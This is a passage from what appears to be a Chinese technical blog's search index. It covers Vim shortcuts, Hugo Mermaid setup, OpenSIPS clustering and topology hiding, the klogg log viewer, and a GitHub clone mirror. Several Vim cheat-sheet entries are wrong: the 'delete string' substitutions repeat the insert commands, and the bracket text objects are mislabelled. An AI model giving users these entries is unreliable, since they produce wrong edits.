跳到之前的位置 `` 跳到之前修改的位置 `. 跳到选区的起始位置 `\u0026lt; 跳到选区的结束位置 `\u0026gt; 33. 滚动屏幕 向下,向上滚动一屏 ctrl+b, ctrl+f 向下,向上滚动半屏 ctrl+d, ctrl+u 34. 插入模式 光标前、后插入 i,a 行首,行尾插入 I, A 在当前行上、下另一起行插入 O, o 从当前单词末尾插入 ea 退出插入模式 esc 删除前一个单词 ctrl+w 删除到行首 ctrl+u 35. 编辑 替换光标下的字符 r 将下一行合并到当前行 J 将下一行合并到当前行,并一种中间的空白字符 gJ 清空当前行,并进入插入模式 cc 清空当前单词,并进入插入模式 cw 撤销修改 u 删除光标下的一个字符,然后进入插入模式 s 36. 选择文本 普通光标选择, 进入选择文本模式 v 行选择,进入选择文本模式 V 块选择,进入选择文本模式 ctrl+v 在多行行首插入注释# ctrl+v 然后选择快,然后输入I, 然后输入#, 然后按esc 注意,输入I指令时,光标只会定位到一个位置,编辑的内容也只是在一个位置,但是按了esc后,多行都会出现# 进入选择文本模式之后 选择光标所在单词(光标要先位于单词上) aw 选择光标所在()区域,包括(), 光标要先位于一个括号上 ab 选择光标所在[]区域,包括[], 光标要先位于一个括号上 aB 选择光标所在()区域,不包括(), 光标要先位于一个括号上 ib 选择光标所在[]区域,不包括[], 光标要先位于一个括号上 iB 退出可视化区域 esc 37. 选择文本命令 向左右缩进 \u0026lt;, \u0026gt; 复制 y 剪切 d 大小写转换 ~ 38. 标记 显示标记列表 :marks 标记当前位置为a ma 跳转到标记a的位置 `a 39. 剪切删除 剪切当前行 dd 剪切2行 2dd 剪切当前单词 dw 从光标所在位置剪切到行尾 D, d$ 剪切当前字符 x 删除单引号中的内容 di\u0026rsquo; da’ 删除包括' 删除双引号中的内容 di\u0026quot; da\u0026quot; 删除包括\u0026quot; 删除中括号中的内容 di[ da[ 删除包括[ 删除大括号中的内容 di{ da{ 删除包括{ 删除括号中的内容 di( da( 删除包含( 从当前光标位置,删除到到字符a dta 40. global命令 删除所有不包含匹配项的文本行 :v/re/d re可以是字符,也可以是正则 显示所有不包含匹配项的文本行 :v/re/p re可以是字符,也可以是正则 删除包含匹配项的行 :g/re/d re可以是字符,也可以是正则 显示所有包含匹配项的行 :g/re/p re可以是字符,也可以是正则 41. 文本对象 当前单词 iw 当前单词和一个空格 aw 当前句子 is 当前句子和一个空格 as 当前段落 ip 当前段落和一个空行 ap 一对圆括号 a) 或 ab 圆括号内部 i) 或 ib 一对花括号 a}或 aB 花括号内部 i}或 iB a表示匹配两点和两点之间的字符), }, ], \u0026gt; , ‘, “, `, t(xml) i表示匹配两点内部之间的字符 42. 复制 复制当前行 yy 复制2行 2yy 复制当前单词 yw 从光标所在位置复制到行尾 y$ 复制单引号中的内容 yi\u0026rsquo; ya\u0026rsquo; 复制包括' 复制双引号中的内容 yi\u0026quot; ya” 复制包括\u0026quot; 复制中括号中的内容 yi[ ya[ 复制包括[ 复制大括号中的内容 yi{ ya{ 复制包括{ 43. 粘贴 在光标后粘贴 p 在光标前粘贴 P 44. 保存退出 保存 w 保存并退出 wq 不保存退出 q! 保存所有tab页并退出 wqa 46. 查找 向下查找key /key 向上查找key ?key 下一个key n 上一个key N 移除搜索结果高亮 :noh 设置搜索高亮 :set hlsearch 统计当前模式匹配的个数 :%s///gn 47. 字符串替换 全文将old替换为new %s/old/new/g 全文将old替换为new, 但是会一个一个确认 %s/old/new/gc 48. 多文件搜索 多文件搜索 :vimgrep /key/ {file} vimgrep /export/ */ 切换到下一个文件 cn 切换到上一个文件 cp 查看搜索结果列表 copen 查看文件缓冲区 :ls 49. 窗口分割 水平分割窗口 :split 默认split仅针对当前文件,如果在新窗口打开新的文件,可以:split file 垂直分割窗口 :vsplit 打开空白的窗口 :new 关闭分割的窗口 ctrl+wq, :close 有时候ctrl+wq不管用,需要用close 窗口之间切换 ctrl+ww 切换到左边窗口 ctrl+wh 切换到右边窗口 ctrl+wl 切换到下边窗口 ctrl+wj 切换到上边窗口 ctrl+wk 关闭所有窗口 :qall 这表示 \u0026ldquo;quit all\u0026rdquo; (全部退出)。如果任何一个窗口没有存盘,Vim 都不会退出。同时光 标会自动跳到那个窗口,你可以用 \u0026ldquo;:write\u0026rdquo; 命令保存该文件或者 \u0026ldquo;:quit!\u0026rdquo; 放弃修改。 保存所有窗口修改后的内容 :wall 如果你知道有窗口被改了,而你想全部保存 关闭所有窗口,放弃所有修改 :qall! 注意,这个命令是不能撤销的。 保存所有修改,然后退出vim :wqall 窗口更多内容 http://vimcdoc.sourceforge.net/doc/usr_08.html#usr_08.txt\n50. 宏 录制宏a qa 停止录制宏 q 51. 标签页 新建标签页 tabnew 在新标签页中打开file tabnew file 切换到下个标签页 gt 切换到上个标签页 gT 关闭当前标签页 :tabclose, :tabc 关闭其他标签页 :tabo, :tabonly 在所有标签页中执行命令 :tabdo commad :tabdo w 52. 文本折叠 折叠文本内容 zfap http://vimcdoc.sourceforge.net/doc/usr_28.html#usr_28.txt 打开折叠 zo 关闭折叠 zc 展开所有折叠 zr 打开所有光标行上的折叠用 zO 关闭所有光标行上的折叠用 zC 删除一个光标行上的折叠用 zd 删除所有光标行上的折叠用 zD 53. 设置 设置vim编辑器的宽度 set columns=200 54. 自动补全 使用自动补全的下一个列表项 ctrl+n 使用自动补全的上一个列表项 ctrl+p 确认当前选择项 ctrl+y 还原最早输入项 ctrl+e 55. 杂项 在vim中执行外部命令 :!ls -al 查看当前光标所在行与百分比 ctrl+g 挂起vim, 使其在后台运行 ctrl+z 查看后台挂起的程序 jobs 使挂起的vim前台运行 fg 如果有多个后台挂起的任务, 则需要指定任务序号,如 :fg %1 在每行行尾添加字符串abc :%s/$/abc 在每行行首添加字符串abc :%s/^/abc 每行行尾删除字符串abc :%s/$/abc 每行行首删除字符串abc :%s/^/abc 删除含有abc字符串的行 :g/abc/d 删除每行行首到特定字符的内容,非贪婪匹配 : %s/^.{-}abc// var = abc123, 会删除var = abc 调换当前行和它的下一行 ddp 全文格式化 gg 跳到第一行 shift v shift g = 参考\nhttps://vim.rtorr.com/lang/zh_cn http://vimcdoc.sourceforge.net/doc/help.html https://www.oschina.net/translate/learn-vim-progressively ","permalink":"https://wdd.js.org/vim/vim-tips/","summary":"Info C表示按住Ctrl, C-o表示同时按住Ctrl和o 1. 在tmux中 vim-airline插件颜色显示不正常 解决方案:\nexport TERM=screen-256color 2. buffer相关操作 :ls # 显示所有打开的buffer :b {bufferName} #支持tab键自动补全 :bd # 关闭当前buffer :bn # 切换到下一个buffer :bp # 切换到上一个buffer :b# # 切换到上一个访问过的buffer :b1 # 切换到buffer1 :bm # 切换到最近修改过的buffer :sb {bufferName} # 上下分屏 :vert sb {bufferName} # 左右分屏 3. 跳转到对应的符号上 下面这种符号,一般都是成双成对的,只要在其中一个上按%, 就会自动跳转到对应的符号\n() [] {} 4. 关闭netrw的banner 如果熟练的是用了netrw,就可以把默认开启的banner给关闭掉。\nlet g:netrw_banner = 0 let g:netrw_liststyle = 3 let g:netrw_winsize = 25 5. 如何同时保存所有发生变化的文件? 把所有发生变化的文件给保存 :wa 把所有发生变化的文件都保存,然后退出vim :xa 退出vim, 所有发生变化的文件都不保存,:qa!","title":"1001个Vim高级技巧 - 0-55"},{"content":"增加mermaid shortcodes 在themes/YourTheme/layouts/shortcodes/mermaid.html 增加如下内容\n\u0026lt;script async type=\u0026#34;application/javascript\u0026#34; src=\u0026#34;https://cdn.jsdelivr.net/npm/mermaid@9.1.1/dist/mermaid.min.js\u0026#34;\u0026gt; var config = { startOnLoad:true, theme:\u0026#39;{{ if .Get \u0026#34;theme\u0026#34; }}{{ .Get \u0026#34;theme\u0026#34; }}{{ else }}dark{{ end }}\u0026#39;, align:\u0026#39;{{ if .Get \u0026#34;align\u0026#34; }}{{ .Get \u0026#34;align\u0026#34; }}{{ else }}center{{ end }}\u0026#39; }; mermaid.initialize(config); \u0026lt;/script\u0026gt; \u0026lt;div class=\u0026#34;mermaid\u0026#34;\u0026gt; {{.Inner}} \u0026lt;/div\u0026gt; 在blog中增加如下代码 Warning 注意下面的代码,你在实际写的时候,要把 /* 和 */ 删除 {{/*\u0026lt; mermaid align=\u0026#34;left\u0026#34; theme=\u0026#34;neutral\u0026#34; */\u0026gt;}} pie title French Words I Know \u0026#34;Merde\u0026#34; : 50 \u0026#34;Oui\u0026#34; : 35 \u0026#34;Alors\u0026#34; : 10 \u0026#34;Non\u0026#34; : 5 {{/*\u0026lt; /mermaid \u0026gt;*/}} pie title French Words I Know \"Merde\" : 50 \"Oui\" : 35 \"Alors\" : 10 \"Non\" : 5 sequenceDiagram title French Words I Know autonumber Alice-\u003e\u003eBob: hello Bob--\u003e\u003eAlice: hi Alice-\u003eBob: talking ","permalink":"https://wdd.js.org/posts/2022/05/02-hugo-add-mermaid/","summary":"增加mermaid shortcodes 在themes/YourTheme/layouts/shortcodes/mermaid.html 增加如下内容\n\u0026lt;script async type=\u0026#34;application/javascript\u0026#34; src=\u0026#34;https://cdn.jsdelivr.net/npm/mermaid@9.1.1/dist/mermaid.min.js\u0026#34;\u0026gt; var config = { startOnLoad:true, theme:\u0026#39;{{ if .Get \u0026#34;theme\u0026#34; }}{{ .Get \u0026#34;theme\u0026#34; }}{{ else }}dark{{ end }}\u0026#39;, align:\u0026#39;{{ if .Get \u0026#34;align\u0026#34; }}{{ .Get \u0026#34;align\u0026#34; }}{{ else }}center{{ end }}\u0026#39; }; mermaid.initialize(config); \u0026lt;/script\u0026gt; \u0026lt;div class=\u0026#34;mermaid\u0026#34;\u0026gt; {{.Inner}} \u0026lt;/div\u0026gt; 在blog中增加如下代码 Warning 注意下面的代码,你在实际写的时候,要把 /* 和 */ 删除 {{/*\u0026lt; mermaid align=\u0026#34;left\u0026#34; theme=\u0026#34;neutral\u0026#34; */\u0026gt;}} pie title French Words I Know \u0026#34;Merde\u0026#34; : 50 \u0026#34;Oui\u0026#34; : 35 \u0026#34;Alors\u0026#34; : 10 \u0026#34;Non\u0026#34; : 5 {{/*\u0026lt; /mermaid \u0026gt;*/}} pie title French Words I Know \"","title":"hugo博客增加mermaid 绘图插件"},{"content":"共享分机注册信息有两种方式\n集群使用相同的数据库,多个节点实时读取数据 优点:使用简单,即使所有节点重启,也能立即从数据库中恢复分机注册数据 缺点:对数据库过于依赖,一旦数据库出现性能瓶颈,则会立即影响所有的呼叫 是用cluster模块,不使用数据库,通过opensips自带的二进制同步方式 优点:不用数据库,消息处理速度快,减少对数据库的压力 缺点:一旦所有节点挂掉,所有的分机注册信息都会损失。但是挂掉所有节点的概率还是比较小的。 今天要讲的方式就是通过cluster的方式进行共享注册信息的方案。\n假设有三个节点:\n在其中一个节点上注册的分机信息会同步给其他的节点 假设其中节点a重启了,节点a会自动选择b或者c来拉取第一次初始化的分机信息 举例来说:\n8001分机在b上注册成功 b把8001的注册信息通过cluster模块通知给a和c 8002分机在a上注册成功 a把8002的注册信息通过cluster模块通知给b和c 此时整个集群有两个分机8001和8002 节点c突然崩溃重启 节点c重启之后,向b发出请求,获取所有注册的分机 节点b像节点c推送全量的分机注册信息 此时三个节点又恢复同步状态 cluster表设计:\n空的字段我就没写了,flags字段必须设置为seed, 这样节点重启后,才知道要像哪个节点同步全量数据 id,cluster_id,node_id,url,state,flags 1,1,1,bin:a:5000,1,seed 2,1,2,bin:b:5000,1,seed 3,1,3,bin:c:5000,1,seed 脚本修改:\n# 增加 bin的listen, 对应cluster表的url listen=bin:192.168.2.130:5000 # 加载proto_bin和clusterer模块 loadmodule \u0026#34;proto_bin.so\u0026#34; loadmodule \u0026#34;clusterer.so\u0026#34; modparam(\u0026#34;clusterer\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql:xxxx\u0026#34;) # 设置数据库地址 modparam(\u0026#34;clusterer\u0026#34;, \u0026#34;current_id\u0026#34;, 1) # 设置当前node_id modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;working_mode_preset\u0026#34;, \u0026#34;full-sharing-cluster\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;location_cluster\u0026#34;, 1) # 设置当前的集群id 其他操作保持原样,opensips就会自动同步分机数据了。\n","permalink":"https://wdd.js.org/opensips/ch9/cluster-share-location/","summary":"共享分机注册信息有两种方式\n集群使用相同的数据库,多个节点实时读取数据 优点:使用简单,即使所有节点重启,也能立即从数据库中恢复分机注册数据 缺点:对数据库过于依赖,一旦数据库出现性能瓶颈,则会立即影响所有的呼叫 是用cluster模块,不使用数据库,通过opensips自带的二进制同步方式 优点:不用数据库,消息处理速度快,减少对数据库的压力 缺点:一旦所有节点挂掉,所有的分机注册信息都会损失。但是挂掉所有节点的概率还是比较小的。 今天要讲的方式就是通过cluster的方式进行共享注册信息的方案。\n假设有三个节点:\n在其中一个节点上注册的分机信息会同步给其他的节点 假设其中节点a重启了,节点a会自动选择b或者c来拉取第一次初始化的分机信息 举例来说:\n8001分机在b上注册成功 b把8001的注册信息通过cluster模块通知给a和c 8002分机在a上注册成功 a把8002的注册信息通过cluster模块通知给b和c 此时整个集群有两个分机8001和8002 节点c突然崩溃重启 节点c重启之后,向b发出请求,获取所有注册的分机 节点b像节点c推送全量的分机注册信息 此时三个节点又恢复同步状态 cluster表设计:\n空的字段我就没写了,flags字段必须设置为seed, 这样节点重启后,才知道要像哪个节点同步全量数据 id,cluster_id,node_id,url,state,flags 1,1,1,bin:a:5000,1,seed 2,1,2,bin:b:5000,1,seed 3,1,3,bin:c:5000,1,seed 脚本修改:\n# 增加 bin的listen, 对应cluster表的url listen=bin:192.168.2.130:5000 # 加载proto_bin和clusterer模块 loadmodule \u0026#34;proto_bin.so\u0026#34; loadmodule \u0026#34;clusterer.so\u0026#34; modparam(\u0026#34;clusterer\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql:xxxx\u0026#34;) # 设置数据库地址 modparam(\u0026#34;clusterer\u0026#34;, \u0026#34;current_id\u0026#34;, 1) # 设置当前node_id modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;working_mode_preset\u0026#34;, \u0026#34;full-sharing-cluster\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;location_cluster\u0026#34;, 1) # 设置当前的集群id 其他操作保持原样,opensips就会自动同步分机数据了。","title":"集群共享分机注册信息"},{"content":"项目信息 github地址 https://github.com/variar/klogg\n1. 安装 klogg是个跨平台软件,windows, mac, linux都可以安装。具体安装方式参考github项目地址\n2. 界面布局 文件信息栏 日志栏 过滤器设置栏 过滤后的日志显示栏 3. 文件加载 klogg支持多种方式加载日志文件\n将日志文件拖动到klogg中 直接将常见的压缩包文件拖动到klogg中,klogger将会自动将其解压后展示 支持从http url地址下载日志,然后查看 支持从剪贴板复制日志,然后展示 4. 过滤表达式 因为klogg支持正则过滤,所以他的功能就非常强悍了。\n逻辑表达式\n表达式 例子 备注 与 and \u0026ldquo;open\u0026rdquo; and \u0026ldquo;close\u0026rdquo; 包含open,并且包含close 或 or \u0026ldquo;open\u0026rdquo; or \u0026ldquo;close\u0026rdquo; 包含open, 或者 close 非 not not(\u0026ldquo;open\u0026rdquo;) 不包含open 与或非同时支持复杂的运算,例如包含open 但是不包含close: \u0026quot;open\u0026quot; and not(\u0026quot;close\u0026quot;)\n5. 快捷方式 klogg的快捷方式很多参考了vim, vim使用者非常高兴。\n键 动作 arrows 上下或者左右移动 [number] j/k 支持用j/k上下移动 h/l 支持用h/l左右移动 ^ or $ 滚动到某行的开始或者结尾 [number] g 跳到对应的行 entered G 跳到第一行 Shift+G 跳到最后一行 Alt+G 显示跳到某一行的对话框 \u0026rsquo; or \u0026quot; 在当前屏幕快速搜索 (forward and backward) n or N 向前或者向后跳 * or . search for the next occurrence of the currently selected text / or , search for the previous occurrence of the currently selected text f 流的方式,类似 tail -f m 标记某一行,标记后的行会自动加入过滤结果中 [ or ] 跳转到上一个或者下一标记点 + or - 调整过滤窗口的尺寸 v 循环切换各种显示模式- Matches: 只显式匹配的内容- Marks: 只显式标记的内容- Marks and Matchs:显示匹配和标记的内容 (Marks and Matches -\u0026gt; Marks -\u0026gt; Matches) F5 重新加载文件 Ctrl+S Set focus to search string edit box Ctrl+Shift+O 打开对话框去选择其他文件 参考 https://github.com/variar/klogg/blob/master/DOCUMENTATION.md ","permalink":"https://wdd.js.org/posts/2022/04/cipwms/","summary":"项目信息 github地址 https://github.com/variar/klogg\n1. 安装 klogg是个跨平台软件,windows, mac, linux都可以安装。具体安装方式参考github项目地址\n2. 界面布局 文件信息栏 日志栏 过滤器设置栏 过滤后的日志显示栏 3. 文件加载 klogg支持多种方式加载日志文件\n将日志文件拖动到klogg中 直接将常见的压缩包文件拖动到klogg中,klogger将会自动将其解压后展示 支持从http url地址下载日志,然后查看 支持从剪贴板复制日志,然后展示 4. 过滤表达式 因为klogg支持正则过滤,所以他的功能就非常强悍了。\n逻辑表达式\n表达式 例子 备注 与 and \u0026ldquo;open\u0026rdquo; and \u0026ldquo;close\u0026rdquo; 包含open,并且包含close 或 or \u0026ldquo;open\u0026rdquo; or \u0026ldquo;close\u0026rdquo; 包含open, 或者 close 非 not not(\u0026ldquo;open\u0026rdquo;) 不包含open 与或非同时支持复杂的运算,例如包含open 但是不包含close: \u0026quot;open\u0026quot; and not(\u0026quot;close\u0026quot;)\n5. 快捷方式 klogg的快捷方式很多参考了vim, vim使用者非常高兴。\n键 动作 arrows 上下或者左右移动 [number] j/k 支持用j/k上下移动 h/l 支持用h/l左右移动 ^ or $ 滚动到某行的开始或者结尾 [number] g 跳到对应的行 entered G 跳到第一行 Shift+G 跳到最后一行 Alt+G 显示跳到某一行的对话框 \u0026rsquo; or \u0026quot; 在当前屏幕快速搜索 (forward and backward) n or N 向前或者向后跳 * or .","title":"klogg: 目前我最喜欢的日志查看工具"},{"content":"这个报错比较容易出现在tcp转udp的场景,可以看以下的时序图\nab之间用tcp通信,bc之间用udp通信。在通话建立后,c给b发送了bye请求,但是b发送给了c 477。正常来说b应该把bye转发给a.\n那么问题出在哪里呢?\n问题就出在update请求的响应上,update的响应200ok中带有Contact头,如果是Contact是个nat的地址,没有经过fixed nat, 那么b是无法直接给nat内部的地址发送请求的。\n处理的办法也很简单,就是在收到a返回的200ok时,执行fix_nated_contact()\n遇到这种问题,往往进入一种思维误区,就是在INVITE请求成功后,fix了nat Contact后,Contact头是不会变的。\n但是实际上,很多SIP请求,例如NOTIFY, UPDATE都会携带请求和响应都会携带Contact, 如果只处理了INVITE的Contact头,没有处理其他携带Contact的sip请求或者响应,就必然也会遇到类似的问题。\n我们知道SIP的Contact后,决定了序列化请求的request url。如果Contact处理的有问题,必然在按照request url转发的时候出现问题。\n综上所述:无论请求还是响应,都要考虑这个消息是否携带了Contact头,以及是否需要fix nat Contact。\n","permalink":"https://wdd.js.org/opensips/ch7/tm-send-failed/","summary":"这个报错比较容易出现在tcp转udp的场景,可以看以下的时序图\nab之间用tcp通信,bc之间用udp通信。在通话建立后,c给b发送了bye请求,但是b发送给了c 477。正常来说b应该把bye转发给a.\n那么问题出在哪里呢?\n问题就出在update请求的响应上,update的响应200ok中带有Contact头,如果是Contact是个nat的地址,没有经过fixed nat, 那么b是无法直接给nat内部的地址发送请求的。\n处理的办法也很简单,就是在收到a返回的200ok时,执行fix_nated_contact()\n遇到这种问题,往往进入一种思维误区,就是在INVITE请求成功后,fix了nat Contact后,Contact头是不会变的。\n但是实际上,很多SIP请求,例如NOTIFY, UPDATE都会携带请求和响应都会携带Contact, 如果只处理了INVITE的Contact头,没有处理其他携带Contact的sip请求或者响应,就必然也会遇到类似的问题。\n我们知道SIP的Contact后,决定了序列化请求的request url。如果Contact处理的有问题,必然在按照request url转发的时候出现问题。\n综上所述:无论请求还是响应,都要考虑这个消息是否携带了Contact头,以及是否需要fix nat Contact。","title":"opensips 477 Send failed (477/TM)"},{"content":"我之前写过一篇文章《macbook pro使用三年后的感受》,今天这篇文章是用4.5年的感受。\n再次梳理一下,中间遇到过的问题\n蝴蝶键盘很早有有些问题了,最近疫情在家,键盘被用坏了,J键直接坏了。只能外接键盘来用 屏幕下方出现淡红色的纹路,不太明显,基本不影响使用 中间我自己给macbook换过一次电池,换电池之前只要不插电,macbook很容易就关机了 风扇经常转,噪音有点吵,我已经觉得无所谓了 17年买这台电脑的时候,应该是9400左右。配置应该是最低配的 i5双核2.3Ghz, 8G内存,128硬盘的。\n有些人可能惊讶,128G的硬盘怎么能够用的。但是我的确够用,我的磁盘还有将近50G的剩余空间呢。\n我不是视频或者影音工作者,用的软件比较少。整个应用程序所占用的空间才4个多G。剩下的文稿可能大部分是代码。\n由于我我基本上都是远程用ssh连上nuc上开发,所以mac上的资料更少。\n但是macbook键盘坏了这个问题,是不能忍的。偶尔要移动办工的时候,不可能再带个外接键盘吧。\n是时候准备和陪伴我4.5年的电脑说再见了。\n本来想买14寸的macbook pro m1的,但是重量的增加以及很丑的刘海也是我不能忍的。\n所以我觉得我会买一台轻便点的windows笔记本,而且windows还有一个很吸引我的点,就是linux子系统。这个linux子系统,要比mac的系统更加linux。\n各位同学有没有推荐的windows的轻便笔记本呢?\n","permalink":"https://wdd.js.org/posts/2022/04/er3vob/","summary":"我之前写过一篇文章《macbook pro使用三年后的感受》,今天这篇文章是用4.5年的感受。\n再次梳理一下,中间遇到过的问题\n蝴蝶键盘很早有有些问题了,最近疫情在家,键盘被用坏了,J键直接坏了。只能外接键盘来用 屏幕下方出现淡红色的纹路,不太明显,基本不影响使用 中间我自己给macbook换过一次电池,换电池之前只要不插电,macbook很容易就关机了 风扇经常转,噪音有点吵,我已经觉得无所谓了 17年买这台电脑的时候,应该是9400左右。配置应该是最低配的 i5双核2.3Ghz, 8G内存,128硬盘的。\n有些人可能惊讶,128G的硬盘怎么能够用的。但是我的确够用,我的磁盘还有将近50G的剩余空间呢。\n我不是视频或者影音工作者,用的软件比较少。整个应用程序所占用的空间才4个多G。剩下的文稿可能大部分是代码。\n由于我我基本上都是远程用ssh连上nuc上开发,所以mac上的资料更少。\n但是macbook键盘坏了这个问题,是不能忍的。偶尔要移动办工的时候,不可能再带个外接键盘吧。\n是时候准备和陪伴我4.5年的电脑说再见了。\n本来想买14寸的macbook pro m1的,但是重量的增加以及很丑的刘海也是我不能忍的。\n所以我觉得我会买一台轻便点的windows笔记本,而且windows还有一个很吸引我的点,就是linux子系统。这个linux子系统,要比mac的系统更加linux。\n各位同学有没有推荐的windows的轻便笔记本呢?","title":"macbook pro 使用1664天的感受"},{"content":"1. 拓扑隐藏功能 删除Via头 删除Route 删除Record-Route 修改Contact 可选隐藏Call-ID 如下图所示,根据SIP的Via, Route, Record-Route的头,往往可以推测服务内部的网络结构。\n我们不希望别人知道的我们的内部网络结构。我们只希望只能看到C这个sip server。经过拓扑隐藏过后\n用户看不到关于a、b的via, route, record-route头 用户看到的Contact头被修改成C的IP地址 可以选择把原始的Call-ID也修改 当然,拓扑隐藏除了可以隐藏一些信息,也有一个其他的好处:减少SIP消息包的长度。如果SIP消息用UDP传输,减少包的体积,可以大大降低UDP分片的可能性。\n所以,综上所述:拓扑隐藏有以下好处\n隐藏服务内部网络结构 减少SIP包的体积 2. 脚本例子 拓扑隐藏的实现并不复杂。首先要加载拓扑隐藏的模块\nloadmodule \u0026#34;topology_hiding.so\u0026#34; 2.1 初始化路由的处理 在初始化路由里,只需要调用topology_hiding()\nU 表示不隐藏Contact的用户名信息 C 表示隐藏Call-ID # if it\u0026#39;s an INVITE dialog, we can create the dialog now, will lead to cleaner SIP messages if (is_method(\u0026#34;INVITE\u0026#34;)) create_dialog(); # we do topology hiding, preserving the Contact Username and also hiding the Call-ID topology_hiding(\u0026#34;UC\u0026#34;); t_relay(); exit; 2.2 序列化路由的处理 在序列化请求中,只需要调用topology_hiding_match(), 后续的就可以交给OpenSIPS处理了。\nif (has_totag()) { if (topology_hiding_match()) { xlog(\u0026#34;Succesfully matched this request to a topology hiding dialog. \\n\u0026#34;); xlog(\u0026#34;Calller side callid is $ci \\n\u0026#34;); xlog(\u0026#34;Callee side callid is $TH_callee_callid \\n\u0026#34;); t_relay(); exit; } else { if ( is_method(\u0026#34;ACK\u0026#34;) ) { if ( t_check_trans() ) { t_relay(); exit; } else exit; } sl_send_reply(\u0026#34;404\u0026#34;,\u0026#34;Not here\u0026#34;); exit; } } 2.3 注意事项 如果用了拓扑隐藏,就不要用record_route()用record_route_preset(), 去设置Record-Route头了,否则SIP消息将会在sip server上一只循环发送。\n4. 参考文档 https://www.opensips.org/Documentation/Tutorials-Topology-Hiding https://opensips.org/html/docs/modules/2.1.x/topology_hiding.html#idp256096 ","permalink":"https://wdd.js.org/opensips/ch8/topology-hiding/","summary":"1. 拓扑隐藏功能 删除Via头 删除Route 删除Record-Route 修改Contact 可选隐藏Call-ID 如下图所示,根据SIP的Via, Route, Record-Route的头,往往可以推测服务内部的网络结构。\n我们不希望别人知道的我们的内部网络结构。我们只希望只能看到C这个sip server。经过拓扑隐藏过后\n用户看不到关于a、b的via, route, record-route头 用户看到的Contact头被修改成C的IP地址 可以选择把原始的Call-ID也修改 当然,拓扑隐藏除了可以隐藏一些信息,也有一个其他的好处:减少SIP消息包的长度。如果SIP消息用UDP传输,减少包的体积,可以大大降低UDP分片的可能性。\n所以,综上所述:拓扑隐藏有以下好处\n隐藏服务内部网络结构 减少SIP包的体积 2. 脚本例子 拓扑隐藏的实现并不复杂。首先要加载拓扑隐藏的模块\nloadmodule \u0026#34;topology_hiding.so\u0026#34; 2.1 初始化路由的处理 在初始化路由里,只需要调用topology_hiding()\nU 表示不隐藏Contact的用户名信息 C 表示隐藏Call-ID # if it\u0026#39;s an INVITE dialog, we can create the dialog now, will lead to cleaner SIP messages if (is_method(\u0026#34;INVITE\u0026#34;)) create_dialog(); # we do topology hiding, preserving the Contact Username and also hiding the Call-ID topology_hiding(\u0026#34;UC\u0026#34;); t_relay(); exit; 2.","title":"拓扑隐藏学习以及实践"},{"content":"我有一个github仓库,https://github.com/wangduanduan/opensips, 这个源码比较大,git clone 比较慢。\n我们使用https://www.gitclone.com/提供的加速服务。\n# 从github上clone git clone https://github.com/wangduanduan/opensips.git # 从gitclone上clone # 只需要在github前面加上gitclone.com/ # 速度就非常快,达到1mb/s git clone https://gitclone.com/github.com/wangduanduan/opensips.git 但是这时候git repo的仓库地址是 https://gitclone.com/github.com/wangduanduan/opensips.git,并不是真正的仓库地址,而且我更喜欢用的是ssh方式的远程地址,所以我们就需要修改一下\ngit remote set-url origin git@github.com:wangduanduan/opensips.git ","permalink":"https://wdd.js.org/posts/2022/03/sny4rb/","summary":"我有一个github仓库,https://github.com/wangduanduan/opensips, 这个源码比较大,git clone 比较慢。\n我们使用https://www.gitclone.com/提供的加速服务。\n# 从github上clone git clone https://github.com/wangduanduan/opensips.git # 从gitclone上clone # 只需要在github前面加上gitclone.com/ # 速度就非常快,达到1mb/s git clone https://gitclone.com/github.com/wangduanduan/opensips.git 但是这时候git repo的仓库地址是 https://gitclone.com/github.com/wangduanduan/opensips.git,并不是真正的仓库地址,而且我更喜欢用的是ssh方式的远程地址,所以我们就需要修改一下\ngit remote set-url origin git@github.com:wangduanduan/opensips.git ","title":"github clone加速"},{"content":"故事发生在1988年的美国。这一年互联网的始祖网络,阿帕网已经诞生了将近20年。而我们所熟知的linux将在三年后,也就是1991才出现。\n在1988年,这时候的互联网只有阿帕网。 然而这个网络并没有想象中的那么好用,他还存在很多问题,而且也经常崩溃。\n解决阿帕网崩溃的这个问题,落到了LBL(Lawrence Berkeley National Laboratory实验室的肩上。\n这个实验室有四个牛人,他们同时也是tcpdump的发明人。\nVan Jacobson Sally Floyd Vern Paxson Steve McCanne 这个实验室主要的研究方向是TCP拥塞控制、BSD包过滤、VoIP等方向。\n为了解决阿帕网经常崩溃的问题,就必须要有一个好用的抓包工具。\n本着不重复造轮子的原则,这时候也已经又了一个叫做etherfind的工具,但是这个工具有以下的问题\n包过滤的语法非常蹩脚 协议编解码能力非常弱 性能也非常弱 总之一句话,他们认为etherfind不行。\n工欲善其事,必先利其器。所以他们就想创造一个新的工具。这个工具必须要有以下的特征\n能够从协议栈底层过滤包 把高级的过滤语法能够编译的底层的代码 能够在驱动层进行过滤 创建了一个内核模块叫做 Berkeley Packet Filter(BPF) 参考 https://baike.baidu.com/item/ARPAnet/3562284 ","permalink":"https://wdd.js.org/posts/2022/03/tcpdump/","summary":"故事发生在1988年的美国。这一年互联网的始祖网络,阿帕网已经诞生了将近20年。而我们所熟知的linux将在三年后,也就是1991才出现。\n在1988年,这时候的互联网只有阿帕网。 然而这个网络并没有想象中的那么好用,他还存在很多问题,而且也经常崩溃。\n解决阿帕网崩溃的这个问题,落到了LBL(Lawrence Berkeley National Laboratory实验室的肩上。\n这个实验室有四个牛人,他们同时也是tcpdump的发明人。\nVan Jacobson Sally Floyd Vern Paxson Steve McCanne 这个实验室主要的研究方向是TCP拥塞控制、BSD包过滤、VoIP等方向。\n为了解决阿帕网经常崩溃的问题,就必须要有一个好用的抓包工具。\n本着不重复造轮子的原则,这时候也已经又了一个叫做etherfind的工具,但是这个工具有以下的问题\n包过滤的语法非常蹩脚 协议编解码能力非常弱 性能也非常弱 总之一句话,他们认为etherfind不行。\n工欲善其事,必先利其器。所以他们就想创造一个新的工具。这个工具必须要有以下的特征\n能够从协议栈底层过滤包 把高级的过滤语法能够编译的底层的代码 能够在驱动层进行过滤 创建了一个内核模块叫做 Berkeley Packet Filter(BPF) 参考 https://baike.baidu.com/item/ARPAnet/3562284 ","title":"[未完成] 浪潮之底系列 - 